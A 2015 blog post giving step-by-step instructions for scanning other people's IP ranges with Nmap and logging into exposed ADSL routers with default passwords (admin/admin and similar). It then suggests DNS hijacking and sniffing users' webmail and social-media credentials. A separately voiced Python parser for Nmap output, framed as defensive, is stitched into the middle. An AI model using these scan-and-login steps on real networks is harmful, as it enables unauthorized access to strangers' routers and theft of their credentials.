Wednesday 14 October 2015

HACKING FOR Vulnerable Routers

Search for Vulnerable Routers

Now that we have Nmap sorted, we are going to run the following command to scan for ADSL modem routers based on their banner on port 80. All you need is to pick an IP range; the example below uses the 101.53.64.1/24 range.

Search from Linux using the command line

In Linux run the following command:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'



In Windows or Mac, open Nmap and copy and paste this line:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Once it finds the results, search for the word ‘open’ to narrow them down. A typical Linux Nmap run returns output like the lines below (I’ve changed the IP details, of course):
Host: 101.53.64.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 ()  Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.112 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.115 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 ()        Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 ()        Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 ()        Ports: 80/open/tcp//http?///
Host: 101.53.64.188 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 ()        Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 ()        Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 ()        Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/
This was taking a long time (we are, after all, trying to scan 256 hosts with the command above). Being impatient, I wanted to check whether my Kali Linux box was actually doing anything. I used the following command in a separate terminal to monitor what my PC was doing… it was doing a lot:
tcpdump -ni eth0

That’s a lot of connected hosts with TCP port 80 open. Some are marked ‘tcpwrapped’: the port accepted the TCP connection but closed it without answering Nmap’s service probes, so those hosts are probably not going to serve us a web page.

Search from Windows, Mac or Linux using GUI – NMAP or Zenmap

Assuming you have the Nmap installation sorted, you can now open Nmap (in Kali Linux or a similar Linux distro you can use Zenmap, the cross-platform GUI version of Nmap). Copy and paste the following line into the Command field:
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -
Another form of this command uses a different subnet-mask notation (note that /26 only covers the 64 addresses 101.53.64.0–63, whereas 1-255 covers the whole /24):
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -
Press the Scan button and wait a few minutes until the scan is over.

Once you have some results, you need to find the devices with open ports. In the results page:
  1. Click on Services Button
  2. Click on http Service
  3. Click on the Ports/Hosts tab (twice to sort them by status)
As you can see, I’ve found a few devices with http port 80 open.

It is quite amazing how many devices have ports open to the outside.

Access Management Webpage

Pick one at a time. For example try this:
http://101.53.64.3
http://101.53.64.4
http://101.53.64.129

You get the idea. If it opens a web page asking for a username and password, try one of the following combinations:
admin/admin
admin/password
admin/pass
admin/secret

If you can find the router’s make and model number, you can look up its exact default username and password on this page: http://portforward.com/default_username_password/

Before we finish up, I am sure you were already as impatient as I was, since a lot of the routers had ‘tcpwrapped’ on them, which was actually stopping us from reaching the web management interface. The following command excludes those devices from our search. I’ve also expanded the search to a broader range using a slightly different subnet mask.
nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In this command I am using a /22 subnet mask with two filters on the output: I am looking for the word ‘open’ and excluding ‘tcpwrapped’. As you can see, I still get a lot of results.
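To make sense of the grepable output listed earlier and of the `grep 'open' | grep -v 'tcpwrapped'` filter above, here is an added Python example (not from the original post) that parses -oG lines per port instead of per line. The sample lines are constructed in the shape of the scan output; the port field layout (port/state/protocol/owner/service/rpc-info/version) and the use of ‘|’ in place of ‘/’ inside those fields are Nmap’s -oG conventions. It shows what the whole-line grep hides: a host whose line carries both a tcpwrapped port and a port with a real banner vanishes from the `grep -v` output, while per-port classification keeps it. The banner inventory at the end is what a defender wants when auditing their own address ranges for exposed management interfaces.

```python
import re
from collections import Counter

# Constructed sample in Nmap's grepable (-oG) format, shaped like the scan output above.
# The last host is the case the whole-line grep filter hides: one tcpwrapped port and
# one port with a real banner on the same line.
SAMPLE_OG = """\
# Nmap scan initiated (constructed sample, not a real scan)
Host: 101.53.64.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 ()  Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.99 () Ports: 80/closed/tcp//http///
Host: 101.53.64.100 ()\tPorts: 80/open/tcp//tcpwrapped///, 443/open/tcp//ssl|http//thttpd/\tIgnored State: filtered (998)
"""

# A -oG host line: "Host: <ip> (<hostname>)  Ports: <entries>" with optional tab-separated
# trailing sections (e.g. "Ignored State: ..."), which we stop at.
HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\s+Ports:\s+(?P<ports>[^\t]*)")


def parse_port_entry(entry):
    """Parse one 'port/state/proto/owner/service/rpc/version/' entry into a dict."""
    fields = entry.strip().split("/")
    if len(fields) < 7:
        return None
    port, state, proto, _owner, service, _rpc, version = fields[:7]
    # Nmap writes '|' where the banner contained '/', so restore the original text.
    return {
        "port": int(port),
        "state": state,
        "proto": proto,
        "service": service.replace("|", "/"),
        "version": version.replace("|", "/"),
    }


def parse_og(text):
    """Return a list of {'ip': ..., 'ports': [...]} for every host line with a Ports: field."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and "Status: Up" lines carry no port data
        entries = (parse_port_entry(e) for e in m.group("ports").split(","))
        hosts.append({"ip": m.group("ip"), "ports": [p for p in entries if p]})
    return hosts


def classify(port):
    """Bucket a port the way the post's grep pipeline tries to, but per port."""
    if port["state"] != "open":
        return "not-open"
    if port["service"] == "tcpwrapped":
        return "tcpwrapped"      # handshake completed, but probes got no banner back
    if port["service"].endswith("?") or not port["version"]:
        return "unidentified"    # open, but no product banner to act on
    return "identified"


def summarize(hosts):
    """Count ports per bucket across all hosts."""
    return Counter(classify(p) for h in hosts for p in h["ports"])


def reachable_web_hosts(hosts):
    """IPs with at least one open, non-tcpwrapped port. Unlike `grep -v 'tcpwrapped'`,
    a host is kept when any of its ports answered, even if another port was wrapped."""
    return [h["ip"] for h in hosts
            if any(classify(p) in ("identified", "unidentified") for p in h["ports"])]


def banner_inventory(hosts):
    """Count identified product banners, e.g. to spot old embedded web servers on your own ranges."""
    return Counter(p["version"] for h in hosts for p in h["ports"] if classify(p) == "identified")


if __name__ == "__main__":
    scanned = parse_og(SAMPLE_OG)
    print(summarize(scanned))
    print(reachable_web_hosts(scanned))
    for banner, n in banner_inventory(scanned).most_common():
        print(f"{n:3d}  {banner}")
```

Pipe a real `-oG -` run into `parse_og` (for example by reading `sys.stdin`) to get the same per-port view over your own scan; the sample run above reports 101.53.64.100 as reachable because its 443 port carries a thttpd banner, even though its port 80 line fragment is tcpwrapped.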

Final Words

You’ll be surprised how many still have the default username and password enabled. Once you have access to the router you can do a lot more, like DNS hijacking or capturing usernames and passwords (for example social media or webmail credentials for Facebook, Twitter, etc.) with tcpdump/snoop on the router’s interface, and many more things… Why did I write this guide? Here’s one example:

As you can see, Jhefeson probably has a legitimate reason to try and reboot this shared router, but he can’t, simply because he doesn’t have physical access to it. If this guide works, he can actually get access back.
There are many things you can do after you’ve got access to a router. You can change DNS settings, set up tcpdump and later sniff all plaintext passwords using Wireshark, etc. If you know a friend, family member, colleague or neighbour who didn’t change their router’s default password, let them know of the risks.
I am not here to judge whether it should be done or not, but this is definitely a way to gain access to a router. So hacking is not always bad; it is sometimes required when you lose access or a system just won’t respond. As a pentester, you should raise awareness. Share this guide, as anyone who uses Linux, Windows or Mac can use it to test their own network and fix the issue.
